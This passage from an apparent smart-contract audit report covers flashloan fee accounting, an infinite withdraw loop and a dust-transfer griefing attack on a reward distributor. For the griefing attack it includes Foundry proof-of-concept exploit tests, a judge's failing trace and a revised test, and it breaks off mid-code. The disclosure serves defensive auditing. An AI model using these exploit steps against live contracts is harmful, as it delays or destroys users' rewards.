. Since lpETH:WETH is always 1:1, when users want to withdraw the WETH, it may revert due to underflow when updating expectedLiquidity
. An example is:
- Currently there is 100 lpETH, 100 WETH,
expectedLiquidity == 100
WETH inside PoolV3. - Flashloan fees of 10 WETH comes in, lpETH is 110 lpETH, WETH is 110 WETH, but
is still 100 WETH. - All lpETH users try to withdraw their WETH. Note that there is enough WETH in PoolV3, but since during withdraw, the
is also updated, so only 100 WETH is allow for withdraw, or else there would be an integer underflow.
Note that CDPVault also uses mintProfit()
to send the extra liquidation penalty as profit to PoolV3.
function flashLoan(
IERC3156FlashBorrower receiver,
address token,
uint256 amount,
bytes calldata data
) external override nonReentrant returns (bool) {
if (token != address(underlyingToken)) revert Flash__flashLoan_unsupportedToken();
uint256 fee = wmul(amount, protocolFee);
uint256 total = amount + fee;
pool.lendCreditAccount(amount, address(receiver));
emit FlashLoan(address(receiver), token, amount, fee);
if (receiver.onFlashLoan(msg.sender, token, amount, fee, data) != CALLBACK_SUCCESS)
revert Flash__flashLoan_callbackFailed();
// reverts if not enough Stablecoin have been send back
underlyingToken.transferFrom(address(receiver), address(pool), total);
@> pool.repayCreditAccount(total - fee, fee, 0);
// @BUG. SHOULD USE pool.mintProfit().
return true;
function repayCreditAccount(
uint256 repaidAmount,
uint256 profit,
uint256 loss
creditManagerOnly // U:[LP-2C]
whenNotPaused // U:[LP-2A]
nonReentrant // U:[LP-2B]
if (profit > 0) {
_mint(treasury, convertToShares(profit)); // U:[LP-14B]
} else if (loss > 0) {
@> expectedLiquidityDelta: -loss.toInt256(),
availableLiquidityDelta: 0,
checkOptimalBorrowing: false
}); // U:[LP-14B,14C,14D]
function mintProfit(uint256 amount) external creditManagerOnly {
_mint(treasury, amount);
@> expectedLiquidityDelta: amount.toInt256(),
availableLiquidityDelta: 0,
checkOptimalBorrowing: false
}); // U:[LP-14B,14C,14D]
function _withdraw(
address receiver,
address owner,
uint256 assetsSent,
uint256 assetsReceived,
uint256 amountToUser,
uint256 shares
) internal {
if (msg.sender != owner) _spendAllowance({owner: owner, spender: msg.sender, amount: shares}); // U:[LP-8,9]
_burn(owner, shares); // U:[LP-8,9]
> expectedLiquidityDelta: -assetsSent.toInt256(),
> availableLiquidityDelta: -assetsSent.toInt256(),
checkOptimalBorrowing: false
}); // U:[LP-8,9]
IERC20(underlyingToken).safeTransfer({to: receiver, value: amountToUser}); // U:[LP-8,9]
if (assetsSent > amountToUser) {
unchecked {
IERC20(underlyingToken).safeTransfer({to: treasury, value: assetsSent - amountToUser}); // U:[LP-8,9]
emit Withdraw(msg.sender, receiver, owner, assetsReceived, shares); // U:[LP-8,9]
Recommended Mitigation Steps
Use mintProfit()
to mint flashloan fees instead.
[H-14] An infinite loop in MultiFeeDistribution.sol
Submitted by novamanbg, also found by novamanbg and 0x40saoirse
An infinite loop will block the withdraw process.
Proof of Concept
In the MultiFeeDistribution.sol the withdraw
function will start going through user’s locked amounts if they do not have enough unlocked to cover their withdraw request:
if (amount <= bal.unlocked) {
bal.unlocked = bal.unlocked - amount;
} else {
uint256 remaining = amount - bal.unlocked;
if (bal.earned < remaining) revert InvalidEarned();
bal.unlocked = 0;
uint256 sumEarned = bal.earned;
uint256 i;
for (i = 0; ; ) {
uint256 earnedAmount = _userEarnings[_address][i].amount;
if (earnedAmount == 0) continue;
However, as you can see it will stay at 0 and the following check will execute:
if (earnedAmount == 0) continue;
This continues and will start a new iteration of the loop; however, it will still be 0
and this loop will never end. As a result, claiming from locked amounts with penalty will not be possible.
Recommended Mitigation Steps
Rewrite the code the following way:
if (earnedAmount == 0) {
Assessed type
[H-15] Directly sending dust token amount will slow down distribution in MultiFeeDistribution.sol
Submitted by novamanbg
While sending a small amount and calling getReward
is a typical example of griefing which is normally considered Medium. Given the low cost of the attack and that no specific external conditions need to be met as well as the high impact for all the users of the protocol I consider it High severity.
Proof of Concept
The _getReward
function in MultiFeeDistribution.sol
will call _notifyUnseenReward
which will execute the following:
uint256 unseen = IERC20(token).balanceOf(address(this)) - r.balance;
if (unseen > 0) {
_notifyReward(token, unseen);
If a small amount of token
is sent directly to the contract this will mean that the unseen amount will also be very small but greater than 0. This will lead to the execution of:
r.rewardPerSecond = ((reward + leftover) * 1e12) / rewardsDuration;
will be the dust amount that was sent by the user. As a result, the following changes to the reward distribution will be made:
else {
uint256 remaining = r.periodFinish - block.timestamp;
uint256 leftover = (remaining * r.rewardPerSecond) / 1e12;
r.rewardPerSecond = ((reward + leftover) * 1e12) / rewardsDuration;
r.lastUpdateTime = block.timestamp;
r.periodFinish = block.timestamp + rewardsDuration;
r.balance = r.balance + reward;
Consider the following scenario:
- Reward period starts at with
r.balance = 1000 eth
andrewardsDuration = 10 days.
(For simplicity, the example will be in days not in seconds). -
9 days have passed and a user calls
so the accumulated reward from the vesting will be 900 eth. However a malicious user decides to send a small reward directly to the protocol. For example, 1 wei and they call get reward again:r.leftover = 100eth
r.rewardPerSecond = (100eth(leftover)+1wei) / 10 days(rewards duration) = 10 eth a day
r.period finish = now +10 days
As you can see simply by directly sending a small amount, the rewardPerSecond
was decreased drastically and the vest is now much longer.
Recommended Mitigation Steps
should not be in functions without access control for trusted protocol roles, as griefing would always be possible. If you still want the unseen amount to be updated frequently consider value-weighted time additions to the vesting.
Koolex (judge) decreased severity to Medium and commented:
Requesting a PoC (coded) to evaluate the risk based on real numbers. Only in PJ QA, please.
I created two tests to show the attack once and multiple times.
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.19; import {TestBase, console} from "../TestBase.sol"; import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol"; import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import {ERC20Mock} from "@openzeppelin/contracts/mocks/ERC20Mock.sol"; import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; import {WAD} from "../../utils/Math.sol"; import {IVaultRegistry} from "../../interfaces/IVaultRegistry.sol"; import {MultiFeeDistribution} from "../../reward/MultiFeeDistribution.sol"; import {IMultiFeeDistribution} from "../../reward/interfaces/IMultiFeeDistribution.sol"; import {IPriceProvider} from "../../reward/interfaces/IPriceProvider.sol"; import {IChefIncentivesController} from "../../reward/interfaces/IChefIncentivesController.sol"; import {LockedBalance, Balances} from "../../reward/interfaces/LockedBalance.sol"; import {Reward} from "../../reward/interfaces/LockedBalance.sol"; // chefIncentivesController.setEligibilityExempt(user, false); // chefIncentivesController.afterLockUpdate(user); contract MockController { constructor() {} function setEligibilityExempt(address user, bool info) external view {} function afterLockUpdate(address user) external view {} } contract MockPriceProvider { constructor() {} function getRewardTokenPrice(address rewardToken, uint256 reward) external view returns (uint256) { return 0; } function update() external view {} } contract MultiFeeDistributionTest is TestBase { using SafeERC20 for IERC20; MultiFeeDistribution internal multiFeeDistribution; ERC20Mock public loopToken; ERC20Mock public stakeToken; ERC20Mock public rewardToken; MockPriceProvider public m; MockController public controller1; address internal mockPriceProvider; address internal mockLockZap; address internal mockDao; uint256 public rewardsDuration = 30 days; uint256 public rewardsLookback = 1 days; uint256 public lockDuration = 10 days; uint256 public burnRatio = 50000; // 50% uint256 public vestDuration = 30 days; function setUp() public virtual override { super.setUp(); mockLockZap = vm.addr(uint256(keccak256("lockZap"))); mockDao = vm.addr(uint256(keccak256("dao"))); m = new MockPriceProvider(); controller1 = new MockController(); mockPriceProvider = address(m); loopToken = new ERC20Mock(); stakeToken = new ERC20Mock(); rewardToken = new ERC20Mock(); multiFeeDistribution = MultiFeeDistribution( address( new ERC1967Proxy( address(new MultiFeeDistribution()), abi.encodeWithSelector( MultiFeeDistribution.initialize.selector, address(loopToken), mockLockZap, mockDao, mockPriceProvider, rewardsDuration, rewardsLookback, lockDuration, burnRatio, vestDuration ) ) ) ); } function _addLockDurations() internal returns (uint256 len) { len = 4; uint256[] memory lockDurations = new uint256[](len); uint256[] memory rewardMultipliers = new uint256[](len); lockDurations[0] = 2592000; lockDurations[1] = 7776000; lockDurations[2] = 15552000; lockDurations[3] = 31104000; rewardMultipliers[0] = 1; rewardMultipliers[1] = 4; rewardMultipliers[2] = 10; rewardMultipliers[3] = 25; multiFeeDistribution.setLockTypeInfo(lockDurations, rewardMultipliers); } function test_exploit_once() public { uint256 amount = 10 ether; address alice = vm.addr(uint256(keccak256("Alice"))); address bob = vm.addr(uint256(keccak256("Bob"))); address minter = vm.addr(uint256(keccak256("minter"))); address[] memory minters = new address[](1); minters[0] = minter; address[] memory rewards = new address[](1); rewards[0] = address(rewardToken); uint256 len = _addLockDurations(); uint256 typeIndex = 0; stakeToken.mint(alice, amount); rewardToken.mint(minter, 100 ether); //the reward will be 100 ether rewardToken.mint(bob, 0.1 ether); //bob will have a very small amount multiFeeDistribution.setLPToken(address(stakeToken)); address incentivesController = address(controller1); address treasury = vm.addr(uint256(keccak256("treasury"))); multiFeeDistribution.setAddresses(IChefIncentivesController(incentivesController), treasury); vm.mockCall( incentivesController, abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, alice), abi.encode(true) ); vm.prank(alice); stakeToken.approve(address(multiFeeDistribution), amount); vm.prank(alice); multiFeeDistribution.stake(amount, alice, 1); multiFeeDistribution.setMinters(minters); vm.prank(minter); multiFeeDistribution.addReward(address(rewardToken)); vm.prank(minter); rewardToken.transfer(address(multiFeeDistribution), 100 ether); vm.warp(block.timestamp); vm.prank(alice); multiFeeDistribution.getReward(rewards); vm.warp(block.timestamp + 20 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 balanceBefore = rewardToken.balanceOf(address(alice)); uint256 dailyTokens1 = rewardToken.balanceOf(address(alice)) / 20; // the amount that alice has devided by the 20 days console.log("daily rewards under normal conditions"); console.log(dailyTokens1); //These are the tokens that alice gets per day - 3.33e18 vm.prank(bob); rewardToken.transfer(address(multiFeeDistribution), 1); //bob transfers the dust amount vm.prank(bob); multiFeeDistribution.getReward(rewards); //calls get reward to update the rate vm.warp(block.timestamp + 1 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 dailyTokens2 = rewardToken.balanceOf(address(alice)) - balanceBefore; balanceBefore = rewardToken.balanceOf(address(alice)); console.log("New daily token rewards:"); console.log(dailyTokens2); //1e18 //at the end bob managed to make it 0.326912783616223995 per day and he can slow it down as much as he wants //What is more is that alice will have to wait for another 30 days! console.log("spent by bob on the attack NOT e18"); console.log(0.1 ether - rewardToken.balanceOf(address(bob))); //Bob spent 20(not 0.20e18) console.log( "Pending rewards that the user will get after another 30 days instead of two of nobody does the attack again:" ); console.log(rewardToken.balanceOf(address(multiFeeDistribution))); //the assets that will be distributed for the next 30 days instead of two } function test_exploit_multiple_times() public { uint256 amount = 10 ether; address alice = vm.addr(uint256(keccak256("Alice"))); address bob = vm.addr(uint256(keccak256("Bob"))); address minter = vm.addr(uint256(keccak256("minter"))); address[] memory minters = new address[](1); minters[0] = minter; address[] memory rewards = new address[](1); rewards[0] = address(rewardToken); uint256 len = _addLockDurations(); uint256 typeIndex = 0; stakeToken.mint(alice, amount); rewardToken.mint(minter, 100 ether); //the reward will be 100 ether rewardToken.mint(bob, 0.1 ether); //bob will have a very small amount multiFeeDistribution.setLPToken(address(stakeToken)); address incentivesController = address(controller1); address treasury = vm.addr(uint256(keccak256("treasury"))); multiFeeDistribution.setAddresses(IChefIncentivesController(incentivesController), treasury); vm.mockCall( incentivesController, abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, alice), abi.encode(true) ); vm.prank(alice); stakeToken.approve(address(multiFeeDistribution), amount); vm.prank(alice); multiFeeDistribution.stake(amount, alice, 1); multiFeeDistribution.setMinters(minters); vm.prank(minter); multiFeeDistribution.addReward(address(rewardToken)); vm.prank(minter); rewardToken.transfer(address(multiFeeDistribution), 100 ether); vm.warp(block.timestamp); vm.prank(alice); multiFeeDistribution.getReward(rewards); vm.warp(block.timestamp + 20 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 balanceBefore = rewardToken.balanceOf(address(alice)); uint256 dailyTokens1 = rewardToken.balanceOf(address(alice)) / 20; // the amount that alice has devided by the 20 days console.log(dailyTokens1); //These are the tokens that alice gets per day - 3.33e18 for (uint i = 0; i < 20; i++) { vm.prank(bob); rewardToken.transfer(address(multiFeeDistribution), 1); //bob transfers the dust amount vm.prank(bob); multiFeeDistribution.getReward(rewards); //calls get reward to update the rate vm.warp(block.timestamp + 1 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 dailyTokens2 = rewardToken.balanceOf(address(alice)) - balanceBefore; balanceBefore = rewardToken.balanceOf(address(alice)); console.log("New daily token rewards:"); console.log(dailyTokens2); //1e18 vm.warp(block.timestamp + 3 days); //waits another three days } //at the end bob managed to make it 0.326912783616223995 per day and he can slow it down however he wants //What is more is that alice will have to wait for another 30 days! console.log(0.1 ether - rewardToken.balanceOf(address(bob))); //Bob spent 20(not 0.20e18) } // @IMPORTANT Performing the attack once instead of twenty times can result in decreasing the rate //and the duration will be reset, starting from beginning again! }
The output is the following:
Results after running the attack once: Logs:
daily rewards under normal conditions 3333333333333333333 New daily token rewards: 1111111111111111111 spent by bob on the attack NOT e18 1 Pending rewards that the user will get after another 30 days instead of two of nobody does the attack again: 32222222222222222224
Results after running the attack 20 times: Logs:
3333333333333333333 - under normal conditions New daily token rewards: 1111111111111111111 New daily token rewards: 4296296296296296296 New daily token rewards: 3723456790123456790 New daily token rewards: 3226995884773662551 New daily token rewards: 2796729766803840878 New daily token rewards: 2423832464563328760 New daily token rewards: 2100654802621551592 New daily token rewards: 1820567495605344713 New daily token rewards: 1577825162857965418 New daily token rewards: 1367448474476903363 New daily token rewards: 1185122011213316248 New daily token rewards: 1027105743051540748 New daily token rewards: 890158310644668648 New daily token rewards: 771470535892046162 New daily token rewards: 668607797773106673 New daily token rewards: 579460091403359117 New daily token rewards: 502198745882911235 New daily token rewards: 435238913098523070 New daily token rewards: 377207058018719994 New daily token rewards: 326912783616223995 20
The attack can be performed by anyone and allows anyone to extend reward finish time indefinitely and causing loss of funds for the users. So I consider it to be a valid High under the following C4 rule: “3 — High: Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals).”
It also does not require any specific external conditions and can be performed anytime. Also the problem is not the attack itself, as it will happen anytime the contract’s balance has changed. This means that even if it is used “the right way” by the protocol team, they will mess up the whole distribution so basically the whole functionality as-is now is useless.
@radin100 - I am getting EVM revert. Any special steps to produce the output above?
Ran 1 test for src/test/unit/poc.t.sol:MultiFeeDistributionTest [FAIL. Reason: EvmError: Revert] test_exploit_multiple_times() (gas: 1019654) Traces: [1019654] MultiFeeDistributionTest::test_exploit_multiple_times() ├─ [0] VM::addr(<pk>) [staticcall] │ └─ ← [Return] 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea ├─ [0] VM::addr(<pk>) [staticcall] │ └─ ← [Return] 0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C ├─ [0] VM::addr(<pk>) [staticcall] │ └─ ← [Return] 0x030F6a4C5Baa7350405fA8122cF458070Abd1B59 ├─ [236649] ERC1967Proxy::setLockTypeInfo([2592000 [2.592e6], 7776000 [7.776e6], 15552000 [1.555e7], 31104000 [3.11e7]], [1, 4, 10, 25]) │ ├─ [231691] MultiFeeDistribution::setLockTypeInfo([2592000 [2.592e6], 7776000 [7.776e6], 15552000 [1.555e7], 31104000 [3.11e7]], [1, 4, 10, 25]) [delegatecall] │ │ ├─ emit LockTypeInfoUpdated(lockPeriod: [2592000 [2.592e6], 7776000 [7.776e6], 15552000 [1.555e7], 31104000 [3.11e7]], rewardMultipliers: [1, 4, 10, 25]) │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [46638] ERC20Mock::mint(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, 10000000000000000000 [1e19]) │ ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, value: 10000000000000000000 [1e19]) │ └─ ← [Stop] ├─ [46638] ERC20Mock::mint(0x030F6a4C5Baa7350405fA8122cF458070Abd1B59, 100000000000000000000 [1e20]) │ ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x030F6a4C5Baa7350405fA8122cF458070Abd1B59, value: 100000000000000000000 [1e20]) │ └─ ← [Stop] ├─ [24738] ERC20Mock::mint(0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C, 100000000000000000 [1e17]) │ ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C, value: 100000000000000000 [1e17]) │ └─ ← [Stop] ├─ [24426] ERC1967Proxy::setLPToken(ERC20Mock: [0xd01212B1b66Aa0Cfc46dE9FcA030867bAec6efC4]) │ ├─ [24031] MultiFeeDistribution::setLPToken(ERC20Mock: [0xd01212B1b66Aa0Cfc46dE9FcA030867bAec6efC4]) [delegatecall] │ │ ├─ emit LPTokenUpdated(_lpToken: ERC20Mock: [0xd01212B1b66Aa0Cfc46dE9FcA030867bAec6efC4]) │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [0] VM::addr(<pk>) [staticcall] │ └─ ← [Return] 0xf43Bca55E8091977223Fa5b776E23528D205dcA8 ├─ [46917] ERC1967Proxy::setAddresses(MockController: [0x3ba9aa3f215faDe4c84F457Ab3e5e64BE0FEFCB3], 0xf43Bca55E8091977223Fa5b776E23528D205dcA8) │ ├─ [46519] MultiFeeDistribution::setAddresses(MockController: [0x3ba9aa3f215faDe4c84F457Ab3e5e64BE0FEFCB3], 0xf43Bca55E8091977223Fa5b776E23528D205dcA8) [delegatecall] │ │ ├─ emit AddressesUpdated(_controller: MockController: [0x3ba9aa3f215faDe4c84F457Ab3e5e64BE0FEFCB3], _treasury: 0xf43Bca55E8091977223Fa5b776E23528D205dcA8) │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [0] VM::mockCall(MockController: [0x3ba9aa3f215faDe4c84F457Ab3e5e64BE0FEFCB3], 0x3adcdfc8000000000000000000000000bf0b5a4099f0bf6c8bc4252ebec548bae95602ea, 0x0000000000000000000000000000000000000000000000000000000000000001) │ └─ ← [Return] ├─ [0] VM::prank(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ └─ ← [Return] ├─ [24629] ERC20Mock::approve(ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], 10000000000000000000 [1e19]) │ ├─ emit Approval(owner: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, spender: ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], value: 10000000000000000000 [1e19]) │ └─ ← [Return] true ├─ [0] VM::prank(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ └─ ← [Return] ├─ [285670] ERC1967Proxy::stake(10000000000000000000 [1e19], 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, 1) │ ├─ [285266] MultiFeeDistribution::stake(10000000000000000000 [1e19], 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, 1) [delegatecall] │ │ ├─ emit LockerAdded(locker: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ │ ├─ [27756] ERC20Mock::transferFrom(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], 10000000000000000000 [1e19]) │ │ │ ├─ emit Approval(owner: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, spender: ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], value: 0) │ │ │ ├─ emit Transfer(from: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, to: ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], value: 10000000000000000000 [1e19]) │ │ │ └─ ← [Return] true │ │ ├─ [0] MockController::afterLockUpdate(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ │ │ └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001 │ │ ├─ emit Locked(user: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, amount: 10000000000000000000 [1e19], lockedBalance: 10000000000000000000 [1e19], lockLength: 7776000 [7.776e6], isLP: true) │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [46084] ERC1967Proxy::setMinters([0x030F6a4C5Baa7350405fA8122cF458070Abd1B59]) │ ├─ [45680] MultiFeeDistribution::setMinters([0x030F6a4C5Baa7350405fA8122cF458070Abd1B59]) [delegatecall] │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [0] VM::prank(0x030F6a4C5Baa7350405fA8122cF458070Abd1B59) │ └─ ← [Return] ├─ [93983] ERC1967Proxy::addReward(ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6]) │ ├─ [93588] MultiFeeDistribution::addReward(ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6]) [delegatecall] │ │ ├─ emit RewardAdded(_rewardToken: ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6]) │ │ └─ ← [Stop] │ └─ ← [Return] ├─ [0] VM::prank(0x030F6a4C5Baa7350405fA8122cF458070Abd1B59) │ └─ ← [Return] ├─ [25093] ERC20Mock::transfer(ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], 100000000000000000000 [1e20]) │ ├─ emit Transfer(from: 0x030F6a4C5Baa7350405fA8122cF458070Abd1B59, to: ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11], value: 100000000000000000000 [1e20]) │ └─ ← [Return] true ├─ [0] VM::warp(2592000 [2.592e6]) │ └─ ← [Return] ├─ [0] VM::prank(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ └─ ← [Return] ├─ [84235] ERC1967Proxy::getReward([0x3C786eec72204b391Fc3B339CEf2E84351999Ea6]) │ ├─ [83830] MultiFeeDistribution::getReward([0x3C786eec72204b391Fc3B339CEf2E84351999Ea6]) [delegatecall] │ │ ├─ [354] MockController::setEligibilityExempt(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, true) │ │ │ └─ ← [Stop] │ │ ├─ [562] ERC20Mock::balanceOf(ERC1967Proxy: [0x27C56392715dCe87635e39F239653dC985b0Dd11]) [staticcall] │ │ │ └─ ← [Return] 100000000000000000000 [1e20] │ │ ├─ emit RevenueEarned(asset: ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6], assetAmount: 100000000000000000000 [1e20]) │ │ ├─ [312] MockPriceProvider::getRewardTokenPrice(ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6], 100000000000000000000 [1e20]) [staticcall] │ │ │ └─ ← [Return] 0 │ │ ├─ emit NewTransferAdded(asset: ERC20Mock: [0x3C786eec72204b391Fc3B339CEf2E84351999Ea6], lpUsdValue: 0) │ │ ├─ [354] MockController::setEligibilityExempt(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea, false) │ │ │ └─ ← [Stop] │ │ ├─ [0] MockController::afterLockUpdate(0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea) │ │ │ └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001 │ │ ├─ [104] MockPriceProvider::update() │ │ │ └─ ← [Revert] EvmError: Revert │ │ └─ ← [Revert] EvmError: Revert │ └─ ← [Revert] EvmError: Revert └─ ← [Revert] EvmError: Revert Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 11.24ms (2.50ms CPU time) Ran 1 test suite in 958.64ms (11.24ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests) Failing tests: Encountered 1 failing test in src/test/unit/poc.t.sol:MultiFeeDistributionTest [FAIL. Reason: EvmError: Revert] test_exploit_multiple_times() (gas: 1019654)
@Koolex - thank you for running my tests. It seems that I forgot to add the update function in one of the mock contracts (because I commented out the
in the original code). Now I fixed the test so it will not fail in the original code. Sorry for the inconvenience.// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.19; import {TestBase, console} from "../TestBase.sol"; import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol"; import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import {ERC20Mock} from "@openzeppelin/contracts/mocks/ERC20Mock.sol"; import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; import {WAD} from "../../utils/Math.sol"; import {IVaultRegistry} from "../../interfaces/IVaultRegistry.sol"; import {MultiFeeDistribution} from "../../reward/MultiFeeDistribution.sol"; import {IMultiFeeDistribution} from "../../reward/interfaces/IMultiFeeDistribution.sol"; import {IPriceProvider} from "../../reward/interfaces/IPriceProvider.sol"; import {IChefIncentivesController} from "../../reward/interfaces/IChefIncentivesController.sol"; import {LockedBalance, Balances} from "../../reward/interfaces/LockedBalance.sol"; import {Reward} from "../../reward/interfaces/LockedBalance.sol"; // chefIncentivesController.setEligibilityExempt(user, false); // chefIncentivesController.afterLockUpdate(user); contract MockController { constructor() {} function setEligibilityExempt(address user, bool info) external view {} function afterLockUpdate(address user) external view {} } contract MockPriceProvider { constructor() {} function getRewardTokenPrice(address rewardToken, uint256 reward) external view returns (uint256) { return 0; } function update() external view {} } contract MultiFeeDistributionTest is TestBase { using SafeERC20 for IERC20; MultiFeeDistribution internal multiFeeDistribution; ERC20Mock public loopToken; ERC20Mock public stakeToken; ERC20Mock public rewardToken; MockPriceProvider public m; MockController public controller1; address internal mockPriceProvider; address internal mockLockZap; address internal mockDao; uint256 public rewardsDuration = 30 days; uint256 public rewardsLookback = 1 days; uint256 public lockDuration = 10 days; uint256 public burnRatio = 50000; // 50% uint256 public vestDuration = 30 days; function setUp() public virtual override { super.setUp(); mockLockZap = vm.addr(uint256(keccak256("lockZap"))); mockDao = vm.addr(uint256(keccak256("dao"))); m = new MockPriceProvider(); controller1 = new MockController(); mockPriceProvider = address(m); loopToken = new ERC20Mock(); stakeToken = new ERC20Mock(); rewardToken = new ERC20Mock(); multiFeeDistribution = MultiFeeDistribution( address( new ERC1967Proxy( address(new MultiFeeDistribution()), abi.encodeWithSelector( MultiFeeDistribution.initialize.selector, address(loopToken), mockLockZap, mockDao, mockPriceProvider, rewardsDuration, rewardsLookback, lockDuration, burnRatio, vestDuration ) ) ) ); } function _addLockDurations() internal returns (uint256 len) { len = 4; uint256[] memory lockDurations = new uint256[](len); uint256[] memory rewardMultipliers = new uint256[](len); lockDurations[0] = 2592000; lockDurations[1] = 7776000; lockDurations[2] = 15552000; lockDurations[3] = 31104000; rewardMultipliers[0] = 1; rewardMultipliers[1] = 4; rewardMultipliers[2] = 10; rewardMultipliers[3] = 25; multiFeeDistribution.setLockTypeInfo(lockDurations, rewardMultipliers); } function test_exploit_once() public { uint256 amount = 10 ether; address alice = vm.addr(uint256(keccak256("Alice"))); address bob = vm.addr(uint256(keccak256("Bob"))); address minter = vm.addr(uint256(keccak256("minter"))); address[] memory minters = new address[](1); minters[0] = minter; address[] memory rewards = new address[](1); rewards[0] = address(rewardToken); uint256 len = _addLockDurations(); uint256 typeIndex = 0; stakeToken.mint(alice, amount); rewardToken.mint(minter, 100 ether); //the reward will be 100 ether rewardToken.mint(bob, 0.1 ether); //bob will have a very small amount multiFeeDistribution.setLPToken(address(stakeToken)); address incentivesController = address(controller1); address treasury = vm.addr(uint256(keccak256("treasury"))); multiFeeDistribution.setAddresses(IChefIncentivesController(incentivesController), treasury); vm.mockCall( incentivesController, abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, alice), abi.encode(true) ); vm.prank(alice); stakeToken.approve(address(multiFeeDistribution), amount); vm.prank(alice); multiFeeDistribution.stake(amount, alice, 1); multiFeeDistribution.setMinters(minters); vm.prank(minter); multiFeeDistribution.addReward(address(rewardToken)); vm.prank(minter); rewardToken.transfer(address(multiFeeDistribution), 100 ether); vm.warp(block.timestamp); vm.prank(alice); multiFeeDistribution.getReward(rewards); vm.warp(block.timestamp + 20 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 balanceBefore = rewardToken.balanceOf(address(alice)); uint256 dailyTokens1 = rewardToken.balanceOf(address(alice)) / 20; // the amount that alice has devided by the 20 days console.log("daily rewards under normal conditions"); console.log(dailyTokens1); //These are the tokens that alice gets per day - 3.33e18 vm.prank(bob); rewardToken.transfer(address(multiFeeDistribution), 1); //bob transfers the dust amount vm.prank(bob); multiFeeDistribution.getReward(rewards); //calls get reward to update the rate vm.warp(block.timestamp + 1 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 dailyTokens2 = rewardToken.balanceOf(address(alice)) - balanceBefore; balanceBefore = rewardToken.balanceOf(address(alice)); console.log("New daily token rewards:"); console.log(dailyTokens2); //1e18 //at the end bob managed to make it 0.326912783616223995 per day and he can slow it down as much as he wants //What is more is that alice will have to wait for another 30 days! console.log("spent by bob on the attack NOT e18"); console.log(0.1 ether - rewardToken.balanceOf(address(bob))); //Bob spent 20(not 0.20e18) console.log( "Pending rewards that the user will get after another 30 days instead of two of nobody does the attack again:" ); console.log(rewardToken.balanceOf(address(multiFeeDistribution))); //the assets that will be distributed for the next 30 days instead of two } function test_exploit_multiple_times() public { uint256 amount = 10 ether; address alice = vm.addr(uint256(keccak256("Alice"))); address bob = vm.addr(uint256(keccak256("Bob"))); address minter = vm.addr(uint256(keccak256("minter"))); address[] memory minters = new address[](1); minters[0] = minter; address[] memory rewards = new address[](1); 